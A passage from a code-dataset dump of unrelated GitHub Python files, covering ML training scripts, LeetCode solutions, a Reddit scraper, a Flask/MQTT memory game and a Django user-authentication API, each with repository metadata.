x_1.append(scores[batch_labels[i][0]])\n x_2.append(scores[batch_labels[i][1]])\n\n print('epoch', epoch, 'loss', epoch_loss)\n\n for env_name in ['train'] + val_splits:\n successes = []\n data_dict = data_splits[env_name]\n for instr_id, point in data_dict.items():\n inputs = point['reranker_inputs']\n labels = point['distance']\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n\n labels = torch.Tensor(labels)\n scores = net(inputs)\n pred = scores.max(0)[1].item()\n successes.append(int(labels[pred] <= error_margin))\n print(env_name, average(successes))\n if env_name is target and average(successes) > best_performance:\n best_performance = average(successes)\n save_path = os.path.join(\n args.cache_path, 'candidates_ranker_{}_{}'.format(env_name, best_performance))\n print('saving to', save_path)\n torch.save(net.state_dict(), save_path)\n\nprint('Finished Training')\n\nfor env_name in ['train'] + [target]:\n data_dict = data_splits[env_name]\n successes = []\n inspect = [1, 2, 3, 4, 5, 6]\n other_success = [[] for _ in range(len(inspect))]\n spl = []\n for instr_id, point in data_dict.items():\n inputs = point['reranker_inputs']\n labels = point['distance']\n inputs = torch.stack([torch.Tensor(r) for r in inputs]).cuda()\n labels = torch.Tensor(labels)\n scores = net(inputs)\n\n pred = scores.max(0)[1].item()\n successes.append(int(labels[pred] < error_margin))\n\n if (int(labels[pred] < error_margin)):\n for i in range(len(point['distance'])):\n pass\n #print( point['reranker_inputs'][i])\n #print( scores[i].item(), point['distance'][i], point['reranker_inputs'][i][5])\n # print(\"\\n\")\n\n for idx, i in enumerate(inspect):\n pred = np.argmax([_input[i] for _input in point['reranker_inputs']])\n other_success[idx].append(int(labels[pred] < error_margin))\n\n print(env_name, average(successes))\n for idx in range(len(inspect)):\n print(average(other_success[idx]))\n\nperf_name = '{:.4f}'.format(average(successes))\nsave_path = os.path.join(\n args.cache_path, 'candidates_ranker_{}'.format(perf_name))\nprint('save_path:', save_path)\ntorch.save(net.state_dict(), save_path)\n","repo_name":"volkancirik/FAST","sub_path":"train_reranker.py","file_name":"train_reranker.py","file_ext":"py","file_size_in_byte":8573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70845207932","text":"#!/usr/bin/python3\n\"\"\" A full request with recursion to reddit API\"\"\"\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=''):\n \"\"\"recursive with request to the API \"\"\"\n url = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n data = {'user-agent': 'scraping_rec-0-0-3'}\n try:\n res = requests.get(url, headers=data,\n allow_redirects=False).json()\n query = res.get('data').get('children')\n after = res.get('data').get('after')\n for child in query:\n data = child.get('data').get('title')\n hot_list.append(data)\n if after is None:\n return(hot_list)\n return(recurse(subreddit, hot_list, after))\n except:\n return(None)\n","repo_name":"cristian0497/holberton-system_engineering-devops","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9633658634","text":"import keras\nfrom tensorflow import keras\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os \n# %matplotlib inline\n\nfrom tensorflow import keras\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, add\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape\nfrom keras.regularizers import l2\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.utils import np_utils\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nfrom keras.utils.vis_utils import plot_model\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\nnb_classes = 10\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(X_train.shape[0], 28, 28, 1)\nX_test = X_test.reshape(X_test.shape[0], 28, 28, 1)\nX_train = X_train.astype(\"float32\")/255.\nX_test = X_test.astype(\"float32\")/255.\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\ny_train = np_utils.to_categorical(y_train, nb_classes)\ny_test = np_utils.to_categorical(y_test, nb_classes)\n\n# print(X_train.shape, 'train samples')\n# print(X_test.shape, 'test samples')\n\ninput_size = 784\nhidden_size = 64\noutput_size = 784\n\nx = Input(shape=(28, 28,1)) \n\n# Encoder\nconv1_1 = Conv2D(16, (3, 3), activation='relu', padding='same')(x)\npool1 = MaxPooling2D((2, 2), padding='same')(conv1_1)\nconv1_2 = Conv2D(8, (3, 3), activation='relu', padding='same')(pool1)\npool2 = MaxPooling2D((2, 2), padding='same')(conv1_2)\nconv1_3 = Conv2D(8, (3, 3), activation='relu', padding='same')(pool2)\nh = MaxPooling2D((2, 2), padding='same')(conv1_3)\n\n\n# Decoder\nconv2_1 = Conv2D(8, (3, 3), activation='relu', padding='same')(h)\nup1 = UpSampling2D((2, 2))(conv2_1)\nconv2_2 = Conv2D(8, (3, 3), activation='relu', padding='same')(up1)\nup2 = UpSampling2D((2, 2))(conv2_2)\nconv2_3 = Conv2D(16, (3, 3), activation='relu')(up2)\nup3 = UpSampling2D((2, 2))(conv2_3)\nr = Conv2D(1, (3, 3), activation='sigmoid', padding='same')(up3)\n\nautoencoder = Model(inputs=x, outputs=r)\nautoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')\n\n# SVG(model_to_dot(autoencoder).create(prog='dot', format='svg'))\nplot_model(autoencoder, to_file='convModel.png')\n\nepochs = 3\nbatch_size = 128\n\nhistory = autoencoder.fit(X_train, X_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(X_test, X_test))\n\nconv_encoder = Model(x, h)\nencoded_imgs = conv_encoder.predict(X_test)\n\nn = 10\nplt.figure(figsize=(20, 8))\nfor i in range(n):\n ax = plt.subplot(1, n, i+1)\n plt.imshow(encoded_imgs[i].reshape(4, 16).T)\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n\ndecoded_imgs = autoencoder.predict(X_test)\n\nn = 10\nplt.figure(figsize=(20, 6))\nfor i in range(n):\n # display original\n ax = plt.subplot(3, n, i+1)\n plt.imshow(X_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n \n # display reconstruction\n ax = plt.subplot(3, n, i+n+1)\n plt.imshow(decoded_imgs[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n \nplt.show()\n\nprint(history.history.keys())\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper right')\nplt.show()","repo_name":"thidoiSanren/DenoisingAutoencoder","sub_path":"convolutionalAutoencoder.py","file_name":"convolutionalAutoencoder.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42864813109","text":"# 역순 연결 리스트 LEETCODE 206\n# 반복 구조를 이용한 풀이. 가독성이 좋다.\ndef reverseList(self, head: ListNode) -> ListNode:\n node, prev = head, None\n\n while (node is not None):\n next, node.next = node.next, prev\n prev, node = node, next\n\n return prev","repo_name":"sigridjineth/algorithm_log","sub_path":"leetcode/reverse_linked_list_iterative.py","file_name":"reverse_linked_list_iterative.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"ko","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"21057860050","text":"import numpy as np\nimport pymesh\nimport vtk\nimport glob\nimport os\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\"\"\"\n © Aix Marseille University - LIS-CNRS UMR 7020\n Author(s): Karim Makki, Amine Bohi (karim.makki, amine.bohi{@univ-amu.fr})\n This software is governed by the CeCILL-B license under French law and\n abiding by the rules of distribution of free software. You can use,\n modify and/ or redistribute the software under the terms of the CeCILL-B\n license as circulated by CEA, CNRS and INRIA at the following URL\n \"http://www.cecill.info\".\n As a counterpart to the access to the source code and rights to copy,\n modify and redistribute granted by the license, users are provided only\n with a limited warranty and the software's author, the holder of the\n economic rights, and the successive licensors have only limited\n liability.\n In this respect, the user's attention is drawn to the risks associated\n with loading, using, modifying and/or developing or reproducing the\n software by the user in light of its specific status of free software,\n that may mean that it is complicated to manipulate, and that also\n therefore means that it is reserved for developers and experienced\n professionals having in-depth computer knowledge. Users are therefore\n encouraged to load and test the software's suitability as regards their\n requirements in conditions enabling the security of their systems and/or\n data to be ensured and, more generally, to use and operate it in the\n same conditions as regards security.\n The fact that you are presently reading this means that you have had\n knowledge of the CeCILL-B license and that you accept its terms.\n\"\"\"\n\n\ndef initTxt(filename):\n try:\n os.remove(filename)\n except:\n pass\n\ndef save_vertices_as_vtk_file(surface_points, vtk_out):\n\n nbSurfacePts = len(surface_points[:,0])\n logging.info(surface_points)\n logging.info(nbSurfacePts)\n initTxt(vtk_out)\n vtk_file = open(vtk_out, \"a\")\n vtk_file.write(\"# vtk DataFile Version 3.0\\n\")\n vtk_file.write(\"vtk output\\n\")\n vtk_file.write(\"ASCII\\n\")\n vtk_file.write(\"DATASET POLYDATA\\n\")\n vtk_file.write(\"POINTS {} float\\n\".format(nbSurfacePts))\n for c in range(nbSurfacePts):\n vtk_file.write(\"{:.1f} {:.1f} {:.1f}\\n\".format(surface_points[c,0], surface_points[c,1], surface_points[c,2]))\n print(c)\n vtk_file.write(\"VERTICES {} {}\\n\".format(nbSurfacePts, nbSurfacePts*2))\n for c in range(nbSurfacePts):\n vtk_file.write(\"1 {}\\n\".format(c))\n\n\n# The current folder should contain all the quad meshes generated by Instant Meshes\n# This will output a set of vtk files containing the mesh vertices or the point to be tracked\n\nsubjectSet = glob.glob('./*.obj') \n\nsubjectSet.sort()\nprint(subjectSet)\n\nfor subject in range(len(subjectSet)):\n \n \n subject_name = subjectSet[subject].split('/')[-1].split('.')[0]\n \n outfile_name = './'+subject_name+'.vtk'\n\n m = pymesh.load_mesh(subjectSet[subject])\n\n print(m.vertices.shape)\n\n save_vertices_as_vtk_file(m.vertices, outfile_name)\n\n\n\n \n\n","repo_name":"k16makki/dynPelvis","sub_path":"Dynpelvis3D/4D_Quad_Mesh_Reconstruction/vertices_to_vtk.py","file_name":"vertices_to_vtk.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23087561886","text":"#\n# @lc app=leetcode id=57 lang=python3\n#\n# [57] Insert Interval\n#\n\n# @lc code=start\nclass Solution:\n def insert2(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n i = 0\n while i < len(intervals) and newInterval[0] > intervals[i][0]:\n i += 1\n intervals.insert(i, newInterval)\n\n ans = []\n for interval in intervals:\n if not ans or ans[-1][1] < interval[0]:\n ans.append(interval)\n else:\n ans[-1][1] = max(ans[-1][1], interval[1])\n\n return ans\n\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n s, e = newInterval\n # l interval < newInterval\n # r interval > newInterval\n l, r = [], []\n\n for interval in intervals:\n if interval[1] < s:\n l.append(interval)\n elif interval[0] > e:\n r.append(interval)\n else:\n s = min(s, interval[0])\n e = max(e, interval[1])\n return l + [[s, e]] + r\n\n return ans\n\n# @lc code=end\n","repo_name":"haiyizxx/Algo","sub_path":"problem/Array/57.insert-interval.py","file_name":"57.insert-interval.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8455376765","text":"from tensorflow.keras.applications import imagenet_utils\nimport numpy as np\n# Internal libraries/scripts\nfrom aucmedi.data_processing.subfunctions.sf_base import Subfunction_Base\n\n#-----------------------------------------------------#\n# Subfunction class: Standardize #\n#-----------------------------------------------------#\nclass Standardize(Subfunction_Base):\n \"\"\" A Standardization method which utilizes custom normalization functions and the Keras\n preprocess_input() functionality in order to normalize intensity value ranges to be\n suitable for neural networks.\n\n Default mode: `\"z-score\"`\n\n Possible modes: `[\"z-score\", \"minmax\", \"grayscale\", \"tf\", \"caffe\", \"torch\"]`\n\n\n ???+ info \"Mode Descriptions\"\n\n | Mode | Description |\n | ------------------- | ------------------------------------------------------------------------- |\n | `\"z-score\"` | Sample-wise Z-score normalization (also called Z-transformation). |\n | `\"minmax\"` | Sample-wise scaling to range [0,1]. |\n | `\"grayscale\"` | Sample-wise scaling to grayscale range [0, 255]. |\n | `\"caffe\"` | Will convert the images from RGB to BGR, then will zero-center each color channel with respect to the ImageNet dataset, without scaling. (RGB encoding required!) |\n | `\"tf\"` | Will scale pixels between -1 and 1, sample-wise. (Grayscale/RGB encoding required!) |\n | `\"torch\"` | Will scale pixels between 0 and 1 and then will normalize each channel with respect to the ImageNet dataset. (RGB encoding required!) |\n\n ??? abstract \"Reference - Implementation\"\n Keras preprocess_input() for `\"tf\", \"caffe\", \"torch\"`\n\n https://www.tensorflow.org/api_docs/python/tf/keras/applications/imagenet_utils/preprocess_input\n \"\"\"\n #---------------------------------------------#\n # Initialization #\n #---------------------------------------------#\n def __init__(self, mode=\"z-score\", smooth=0.000001):\n \"\"\" Initialization function for creating a Standardize Subfunction which can be passed to a\n [DataGenerator][aucmedi.data_processing.data_generator.DataGenerator].\n\n Args:\n mode (str): Selected mode which standardization/normalization technique should be applied.\n smooth (float): Smoothing factor to avoid zero devisions (epsilon).\n \"\"\"\n # Verify mode existence\n if mode not in [\"z-score\", \"minmax\", \"grayscale\", \"tf\", \"caffe\", \"torch\"]:\n raise ValueError(\"Subfunction - Standardize: Unknown modus\", mode)\n # Cache class variables\n self.mode = mode\n self.e = smooth\n\n #---------------------------------------------#\n # Transformation #\n #---------------------------------------------#\n def transform(self, image):\n # Perform z-score normalization\n if self.mode == \"z-score\":\n # Compute mean and standard deviation\n mean = np.mean(image)\n std = np.std(image)\n # Scaling\n image_norm = (image - mean + self.e) / (std + self.e)\n # Perform MinMax normalization between [0,1]\n elif self.mode == \"minmax\":\n # Identify minimum and maximum\n max_value = np.max(image)\n min_value = np.min(image)\n # Scaling\n image_norm = (image - min_value + self.e) / \\\n (max_value - min_value + self.e)\n elif self.mode == \"grayscale\":\n # Identify minimum and maximum\n max_value = np.max(image)\n min_value = np.min(image)\n # Scaling\n image_scaled = (image - min_value + self.e) / \\\n (max_value - min_value + self.e)\n image_norm = np.around(image_scaled * 255, decimals=0)\n else:\n # Verify if image is in [0,255] format\n if np.min(image) < 0 or np.max(image) > 255:\n raise ValueError(\"Subfunction Standardize: Image values are not in range [0,255]!\",\n \"Provided min/max values for image are:\", np.min(image), np.max(image),\n \"Ensure that all images are normalized to [0,255] before using the following modes:\",\n \"['tf', 'caffe', 'torch']\")\n # Perform architecture standardization\n image_norm = imagenet_utils.preprocess_input(image, mode=self.mode)\n # Return standardized image\n return image_norm\n","repo_name":"frankkramer-lab/aucmedi","sub_path":"aucmedi/data_processing/subfunctions/standardize.py","file_name":"standardize.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"78"} +{"seq_id":"17781025722","text":"import unittest\nimport pandas as pd\n\n\n# check the basic / default attributes\nclass TestCilaAttributes(unittest.TestCase):\n\n def test_cilia_attributes(self):\n from mmpb.attributes.cilia_attributes import measure_cilia_attributes\n\n input_path = '../../data/0.5.1/segmentations/sbem-6dpf-1-whole-segmented-cilia-labels.h5'\n input_key = 't00000/s00/0/cells'\n resolution = [0.025, 0.01, 0.01]\n base_path = '../../data/0.5.1/tables/sbem-6dpf-1-whole-segmented-cilia-labels/default.csv'\n base = pd.read_csv(base_path, sep='\\t')\n\n out, _ = measure_cilia_attributes(input_path, input_key, base, resolution)\n self.assertEqual(len(out), len(base))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mobie/platybrowser-project","sub_path":"test/attributes/test_cilia.py","file_name":"test_cilia.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"3295060989","text":"import asyncio\nimport json\nfrom threading import Thread\n\nimport websockets\n\nwebsocket_address = \"wss://stream.bybit.com/realtime\"\nlast_price = None\n\n\ndef start():\n # Starts a new thread to listen for Bybit price action\n Thread(target=initialize).start()\n\n\ndef initialize():\n # Sets thread settings\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(listen())\n\n\nasync def listen():\n # Listens for price action and sets the last price to 'last_price'\n global last_price\n async with websockets.connect(websocket_address) as w:\n await w.send('{\"op\":\"subscribe\",\"args\":[\"instrument.BTCUSD\"]}')\n while True:\n result = await w.recv()\n result = json.loads(result)\n try:\n last_price = result[\"data\"][0][\"last_price\"]\n last_price = float(last_price)\n except:\n pass\n\n\ndef get_last_price():\n # Returns 'last_price'\n return last_price\n","repo_name":"jamespeccia/BybitBot","sub_path":"websocket.py","file_name":"websocket.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"19476444082","text":"import random\nimport time\nfrom flask import Flask, request\nfrom flask_mqtt import Mqtt\nfrom flask_socketio import SocketIO\n\n# GLOBAL VARIABLES\ngame = \"none\"\nbussy = False\ncounter = 0 # for memory\nsequence_number = 1 # for memory\nsequence = [] # for memory\nwon = [2,2,2,2] # for memory \nlose = [0,0,0,0]\n\n# MQQT CLIENT \napp = Flask(__name__)\napp.config['SECRET'] = 'my secret key' \napp.config['MQTT_BROKER_URL'] = '127.0.0.1'\napp.config['MQTT_BROKER_PORT'] = 1883\napp.config['MQTT_REFRESH_TIME'] = 1.0 # refresh time in seconds\nmqtt = Mqtt(app)\n\n# Send simple message\ndef send_demo():\n sequence = [0,1,2,3]\n for item in sequence:\n mqtt.publish(str(item), \"1\")\n print(f\"Sending: {item}\")\n time.sleep(2)\n mqtt.loop(timeout=1.0)\n mqtt.publish(str(item), \"off\")\n print(f\"Sending: off\")\n\n\n\n@mqtt.on_message()\ndef handle_mqtt_message(client, userdata, message):\n global game\n # print topic and message\n topic = message.topic\n message = message.payload.decode(\"utf-8\")\n print(f\"Topic: {topic}, Message: {message}\")\n if topic == \"games\":\n if message == \"memory\":\n game = \"memory\"\n print(\"starting memory\")\n send_demo()\n elif message == \"redblue\":\n game = \"redblue\"\n print(\"redblue\")\n elif message == \"zen\":\n game = \"zen\"\n print(\"zen\")\n elif message == \"minesweepr\":\n game = \"minesweepr\"\n print(\"minesweepr\")\n if topic == \"buttons\":\n if game == \"memory\":\n if bussy == False:\n check_sequence(message)\n elif game == \"redblue\":\n # Do read button stuff voor redblue\n print(\"red vs blue button incomming\")\n elif game == \"zen\":\n # Do read button stuff voor zen\n print(\"zen button incomming\")\n elif game == \"minesweepr\":\n # Do read button stuff voor minesweepr\n print(\"minesweeper button incomming\")\n\n@mqtt.on_connect()\ndef handle_connect(client, userdata, flags, rc):\n print(\"Connected with result code \" + str(rc))\n mqtt.subscribe(\"buttons\")\n mqtt.subscribe(\"games\")\n\n\n# GAMES\ndef generate_sequence(sequence_number):\n leds = [0, 1, 2 , 3]\n global sequence\n # Generate sequence\n for i in range(sequence_number):\n led = leds[random.randint(0, len(leds)-1)]\n sequence.append(led)\n return sequence\n\ndef send_sequence(sequence, blink = False):\n global bussy\n if(blink == True):\n for item in sequence:\n # Publish message\n mqtt.publish(str(item), \"1\")\n print(f\"Sending: {item}\")\n # Wait 2 seconds before sending next message mqqt flask\n time.sleep(2)\n print(\"Sending: off\")\n mqtt.publish(str(item), \"off\")\n else:\n mqtt.publish(str(0), str(sequence[0]))\n mqtt.publish(str(1), str(sequence[1]))\n mqtt.publish(str(2), str(sequence[2]))\n mqtt.publish(str(3), str(sequence[3]))\n time.sleep(1)\n for i in range(0,5):\n mqtt.publish(str(i), \"off\")\n\n bussy = False\n\ndef check_sequence(received_sequence):\n # Global variables\n global sequence_number\n global sequence\n global counter\n global won\n global lose\n\n print(int(received_sequence) == sequence[counter])\n # check if the received sequence matches the current sequence\n if int(received_sequence) == sequence[counter]:\n counter += 1\n # check if the entire sequence has been matched\n if counter == len(sequence): \n # Resent counter en sequence \n counter = 0\n sequence = []\n # You have won\n print(f\"You have won! your points: {sequence_number}\")\n mqtt.publish(\"memorypoints\", str(sequence_number))\n send_sequence(won, False)\n # Start new game en higher sequence \n sequence_number += 1\n # Start new game\n start_memory()\n else:\n print(\"Sequence does not match. Game over.\")\n counter = 0\n send_sequence(lose, False)\n send_sequence(sequence=sequence, blink=True)\n\ndef start_memory():\n # Global variables\n global bussy \n global sequence_number\n # Start game\n bussy = True\n sequence = generate_sequence(sequence_number)\n send_sequence(sequence=sequence, blink=True)\n\n# Flask route\n@app.route('/')\ndef index():\n send_demo()\n return \"Hello World\"\n\n\n# APP START\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0')\n\n","repo_name":"Bart-Roels/teamproject-groep5","sub_path":"Testing_Memorygame/appflask.py","file_name":"appflask.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9807273925","text":"import matplotlib\nimport seaborn\n\nfrom . import hig\n\n\ndef set(style=None) -> None:\n \"\"\"\n Set style.\n\n Parameters\n ----------\n - style : dict, None, or one of {darkgrid, whitegrid, dark, white, ticks}\n A dictionary of parameters or the name of a preconfigured set.\n \"\"\"\n style = seaborn.axes_style(style)\n\n style[\"axes.edgecolor\"] = hig.GRAY\n style[\"axes.linewidth\"] = 1.6\n style[\"axes.prop_cycle\"] = hig.cycle\n style[\"figure.dpi\"] = 300\n style[\"grid.color\"] = hig.GRAY\n style[\"legend.edgecolor\"] = hig.GRAY\n style[\"savefig.bbox\"] = \"tight\"\n style[\"savefig.pad_inches\"] = 0.1\n\n matplotlib.rcParams.update(style)\n","repo_name":"simaki/mpl-hig","sub_path":"mpl_hig/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25350575559","text":"import rpi\nimport torch.nn as nn\nimport torch\n\n\nc0 = nn.Conv2d(3, 3, 3, 1, padding=1)\nc1 = nn.Conv2d(3, 5, 5, 1, padding=2)\nc2 = nn.Conv2d(5, 2, 3, 1, padding=1)\n\nc1_ = nn.Conv2d(3, 5, 3, 1, padding=1)\n\nlin = nn.Linear(3*32*2*32, 4)\nlast = nn.Softmax()\n\nm = nn.ModuleList([c0, c1, c2, lin, last])\n\nra = rpi.rolling_arc(m)\n\nx = torch.randn(1,3,32,32)\n\no1 = ra(x)\n\nra.replace_conv_n_with(1, c1_)\n\no2 = ra(x)\n\n","repo_name":"TreeLimes/QANAS","sub_path":"prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21554641114","text":"import requests\nfrom django.contrib.auth import authenticate\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status, permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom config.settings.base import SECRETS\nfrom members.models import *\nfrom members.serializers import *\n\nUser = get_user_model()\n\n\n# superuser 제외\ndef get_queryset_not_superuser(self, request):\n if request.user.gender == '여자':\n partner_gender = '남자'\n else:\n partner_gender = '여자'\n return User.objects.filter(is_superuser=False).filter(gender=partner_gender)\n\n\n# 해당 유저의 이메일 정보로 상세프로필 정보 불러오기\nclass UserThroughEmailAPIView(APIView):\n # superuser만 read/write 할 수 있도록 설정 필요!\n permission_classes = [permissions.IsAdminUser, ]\n\n def post(self, request):\n user = User.objects.get(email=request.data['email'])\n data = {\n 'userProfile': UserProfileSerializer(user).data,\n }\n return Response(data)\n\n\n# 회원가입 (토큰 생성)\nclass CreateUserAPIView(APIView):\n permission_classes = [permissions.AllowAny, ]\n\n def post(self, request):\n serializer = UserCreateSerializer(data=request.data)\n\n if serializer.is_valid():\n user = serializer.save()\n # 계정 생성 시 리본 기본 지급 (맞는지 모르겠음.. 일단 보류)\n UserRibbon.objects.create(user=user, paid_ribbon=0, current_ribbon=50)\n token = Token.objects.create(user=user)\n\n data = {\n 'token': token.key,\n 'user': UserAccountSerializer(user).data,\n }\n return Response(data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass AuthTokenAPIView(APIView):\n # 내 생각엔 GET은 IsAuthenticated 여야함\n permission_classes = [permissions.AllowAny, ]\n\n # (가입된) 유저 리스트\n def get(self, request):\n users = User.objects.all()\n login = []\n logout = []\n on_screening = []\n fail = []\n superusers = []\n\n for user in users:\n # 테스트를 위해 임의 6명 관리자 생성\n if user.is_superuser:\n superusers.append(user.email)\n # 가입심사 중인 상태 (가입심사한 이성 1~2명인 상태)\n elif user.status() == 'on_screening':\n on_screening.append(user)\n # 가입심사 불합격 (가입심사한 이성 3명 이상인 상태)\n elif user.status() == 'fail':\n fail.append(user)\n # 가입심사 합격 (가입심사한 이성 3명 이상인 상태)\n else:\n try:\n # 합격한 유저중 로그인 상태\n login.append(user.auth_token.user)\n except:\n # 합격한 유저중 로그아웃 상태\n logout.append(user)\n\n data = {\n 'superusers': superusers,\n 'login': UserAccountSerializer(login, many=True).data,\n 'logout': UserAccountSerializer(logout, many=True).data,\n 'onScreening': UserAccountSerializer(on_screening, many=True).data,\n 'fail': UserAccountSerializer(fail, many=True).data,\n }\n return Response(data)\n\n # 로그인(토큰 가져오거나 생성)\n def post(self, request):\n email = request.data['email']\n password = request.data['password']\n user = authenticate(email=email, password=password)\n\n # 유저 인증되고, 가입심사 합격한 유저의 경우\n if user and user.status() == 'pass':\n if not len(user.userribbon_set.all()):\n UserRibbon.objects.create(user=user, paid_ribbon=10, current_ribbon=10)\n token, _ = Token.objects.get_or_create(user=user)\n else:\n raise AuthenticationFailed('유저 인증에 성공하지 못하였거나, 가입심사를 합격한 유저가 아닙니다.')\n\n data = {\n 'token': token.key,\n 'user': UserAccountSerializer(user).data\n }\n return Response(data)\n\n\n# 계정 탈퇴\nclass UserDeleteAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n user.delete()\n return Response('탈퇴가 완료되었습니다.')\n else:\n raise AuthenticationFailed('유저 인증에 성공하지 못하였습니다.')\n\n\n# 로그아웃 (토큰 삭제)\nclass LogoutUserAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n token = Token.objects.get(user=request.user)\n\n if not token:\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n token.delete()\n return Response('로그아웃 되었습니다.')\n\n\n# 유저의 상세프로필 전체 정보 가져오기\nclass UserProfileAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if Token.objects.filter(user=request.user):\n data = {\n 'userProfile': UserProfileSerializer(request.user).data,\n }\n return Response(data)\n # 로그아웃된 유저도 정보 볼 수 있도록 해야하는지 확인필요\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n\nclass UserImageAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # user 프로필 이미지 갖고오기\n def get(self, request):\n images = UserImage.objects.filter(user=request.user)\n serializer = UserImageSerializer(images, many=True)\n\n data = {\n 'images': serializer.data,\n }\n return JsonResponse(data, safe=False)\n\n # user 프로필 이미지 추가하기\n # 계정 생성 시 꼭 3개 추가해야 함\n def post(self, request):\n images = request.data.getlist('images')\n\n arr = []\n for image in images:\n data = {\n 'image': image,\n }\n serializer = UserImageSerializer(data=data)\n\n if serializer.is_valid():\n serializer.save(user=request.user)\n arr.append(serializer.data)\n else:\n return Response(serializer.errors)\n\n data = {\n 'images': arr,\n }\n return Response(data, status=status.HTTP_201_CREATED)\n\n # user 프로필 이미지 삭제하기\n def delete(self, request, pk):\n images = UserImage.objects.filter(user=request.user)\n if len(images) <= 3:\n return Response('최소 3장 이상 업로드돼있어야 합니다.')\n\n image = UserImage.objects.filter(user=request.user, pk=pk)\n if image:\n image.delete()\n return Response('해당 이미지가 삭제되었습니다.')\n return Response('해당 이미지의 pk가 존재하지 않습니다.')\n\n\nclass UserInfoAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 상세프로필 정보 가져오기\n def get(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n # 아래 response는 뜨면 안되는 response임..\n # 계정 생성 직후 바로 프로필 정보를 등록해야 함\n if not info:\n return Response('등록된 프로필 정보가 없습니다.')\n\n data = {\n 'info': UserInfoSerializer(info).data,\n }\n return Response(data)\n\n # (회원가입 직후 첫) 상세프로필 작성 (처음 생성 시 딱 한번 사용)\n def post(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n # 이미 등록된 프로필 정보가 있으면 안됨..\n # 계정 생성 직후 첫 프로필정보 등록하는 곳\n if info or request.user.status() == 'pass':\n return Response('이미 등록된 프로필 정보가 있습니다.')\n\n serializer = UserInfoSerializer(data=request.data)\n\n if serializer.is_valid():\n info = serializer.save(user=request.user)\n\n data = {\n 'info': UserInfoSerializer(info).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 